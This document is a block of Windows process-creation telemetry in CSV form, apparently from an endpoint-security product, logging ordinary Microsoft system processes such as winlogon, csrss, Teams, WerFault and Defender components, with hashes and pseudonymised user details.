+1137,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:22:20.273646400+00:00,13020,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 66385913-6B2A-4406-610D-A8410362DD4F ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:22:21.063025700+00:00,2021-06-23 06:22:59.284517800+00:00,6c80a595-7f08-4f47-8e5c-d132a02e106f,computerpii_0a470890c60768167990033d701e7bd881398861,163912,False,10.7740.19041.1052,False,11540474045145394,,11540474045173807,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1138,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,smss.exe 00000110 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,PortableExecutable,2021-05-12 01:12:36.677345+00:00,C:\Windows\System32\smss.exe,155976,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:07.324991200+00:00,728,smss.exe,smss.exe,True,2021-06-10 00:46:07.323061100+00:00,4,%system%\ntoskrnl.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:14.119377700+00:00,2021-06-24 00:52:10.649067300+00:00,6ba2039c-4bd4-4dab-b92f-e8cbe1d736fb,computerpii_0a470890c60768167990033d701e7bd881398861,167457,False,10.7740.19041.1052,False,11540474045136899,,11540474045175070,2021-06-10 00:46:07.324991200+00:00,728,2021-06-10 00:46:07.324991200+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,728,18560,ActiveProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-10 00:46:10.497846200+00:00,2021-05-12 01:12:36.677345+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager
+1139,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 11:04:13.947500200+00:00,16548,csrss.exe,"csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",PortableExecutable,2020-10-09 20:47:25.808617300+00:00,C:\Windows\System32\csrss.exe,17600,72565e7a0145e0657e586f6cf7696dc7,6f1c9b4c187669bc0371260d121caf48d65f829a9104c483befbd8fc0bed24f5,11eba7b1e26cc7d492a2c161ac48370811d0b01e,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,smss.exe 00000110 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:14.120000800+00:00,2021-06-24 00:52:10.649120100+00:00,5e0c8abf-23be-4968-b0c0-d1a0105a6034,computerpii_0a470890c60768167990033d701e7bd881398861,167458,False,10.7740.19041.1052,False,11540474045175070,,11540474045175071,2021-06-23 11:04:13.923843100+00:00,14724,2021-06-23 11:04:13.923843100+00:00,smss.exe,14724,256,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-23 11:04:13.925295+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,CSRSS.Exe,CSRSS.Exe,Client Server Runtime Process
+1140,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,PortableExecutable,2021-04-14 01:10:22.046876900+00:00,C:\Windows\System32\winlogon.exe,907776,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,smss.exe 00000110 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:14.127075200+00:00,2021-06-24 00:52:10.649287200+00:00,84874f6b-a64a-459e-970a-2e02b5300cf2,computerpii_0a470890c60768167990033d701e7bd881398861,167459,False,10.7740.19041.1052,False,11540474045175070,,11540474045175072,2021-06-23 11:04:13.923843100+00:00,14724,2021-06-23 11:04:13.923843100+00:00,smss.exe,14724,256,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-23 11:04:13.925295+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application
+1141,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 11:04:14.042422600+00:00,21340,LogonUI.exe,"""LogonUI.exe"" /flags:0x4 /state0:0xac197855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:14.129170900+00:00,2021-06-24 00:52:10.649382700+00:00,693528a2-bd5f-464d-aa8d-a3c5f3ef0421,computerpii_0a470890c60768167990033d701e7bd881398861,167460,False,10.7740.19041.1052,False,11540474045171720,,11540474045175073,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1142,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 11:04:14.182052500+00:00,9804,LogonUI.exe,"""LogonUI.exe"" /flags:0x2 /state0:0xac199055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:14.321112200+00:00,2021-06-24 00:52:10.649599300+00:00,2591a51a-be4b-4b7f-926b-18503ddd1b95,computerpii_0a470890c60768167990033d701e7bd881398861,167463,False,10.7740.19041.1052,False,11540474045175072,,11540474045175075,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,11720,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1143,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 11:04:14.230210+00:00,15016,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=audio --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=2444 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:14.355914200+00:00,2021-06-24 00:52:10.649797900+00:00,3af4e6ee-0522-4c00-8221-8bc6d1d8d871,computerpii_0a470890c60768167990033d701e7bd881398861,167465,False,10.7740.19041.1052,False,11540474045171817,,11540474045175077,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,18560,TerminateProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1144,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 11:04:16.312056400+00:00,12072,WerFault.exe,WerFault.exe -pss -s 476 -p 11452 -ip 11452,PortableExecutable,2021-03-11 01:06:52.461588600+00:00,C:\Windows\System32\WerFault.exe,568632,f4d9996e7d3c7ed0d9433450c65e64a3,2b385be819454fcfba4463d60943867d9c59c974cf6e75beaac13937d90ebe75,3b235bf5247c69c5f1478272a0800e79186063aa,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:16.273957900+00:00,11668,svchost.exe,svchost.exe -k WerSvcGroup,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:16.412570300+00:00,2021-06-24 00:52:10.650615800+00:00,125f2053-6647-4363-a76e-486faf16d2df,computerpii_0a470890c60768167990033d701e7bd881398861,167478,False,10.7740.19041.1052,False,11540474045175079,,11540474045175080,2021-06-23 11:04:16.273957900+00:00,11668,2021-06-23 11:04:16.273957900+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,11668,2176,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-18 00:35:29.821925200+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.867,WerFault,WerFault.exe,Windows Problem Reporting
+1145,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 11:04:16.437309400+00:00,17012,WerFault.exe,WerFault.exe -u -p 11452 -s 6664,PortableExecutable,2021-03-11 01:06:52.461588600+00:00,C:\Windows\System32\WerFault.exe,568632,f4d9996e7d3c7ed0d9433450c65e64a3,2b385be819454fcfba4463d60943867d9c59c974cf6e75beaac13937d90ebe75,3b235bf5247c69c5f1478272a0800e79186063aa,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 11:04:16.455550600+00:00,2021-06-24 00:52:10.650768600+00:00,7aad9cb9-5bcd-494b-ac86-9b68f880e174,computerpii_0a470890c60768167990033d701e7bd881398861,167481,False,10.7740.19041.1052,False,11540474045171770,,11540474045175082,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 11:04:16.273957900+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,11668,18560,Missing,c:\windows\explorer.exe,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.867,WerFault,WerFault.exe,Windows Problem Reporting
+1146,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:14:55.491089600+00:00,20388,SenseCncProxy.exe,2844,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:14:55.798217200+00:00,2021-06-25 01:17:01.553677400+00:00,767290b3-3ff5-4d4a-a786-b1c1f8afa1bb,computerpii_0a470890c60768167990033d701e7bd881398861,183089,False,10.7740.19041.1052,False,11540474045137006,,11540474045178687,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1147,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:15:08.063754400+00:00,18292,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe846_ Global\UsGthrCtrlFltPipeMssGthrPipe846 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:15:08.412009800+00:00,2021-06-25 01:17:01.554128500+00:00,8da0fdd3-347d-421e-9154-d3d14cd618a2,computerpii_0a470890c60768167990033d701e7bd881398861,183094,False,10.7740.19041.1052,False,11540474045144190,,11540474045178688,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,SearchIndexer.exe,4660,256,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1148,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:15:31.490055200+00:00,19556,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320847_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320847 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:15:31.840998600+00:00,2021-06-25 01:17:01.555305800+00:00,620a6031-8db4-45c9-ac7c-bd9f136c6886,computerpii_0a470890c60768167990033d701e7bd881398861,183106,False,10.7740.19041.1052,False,11540474045144190,,11540474045178692,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,SearchIndexer.exe,4660,256,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
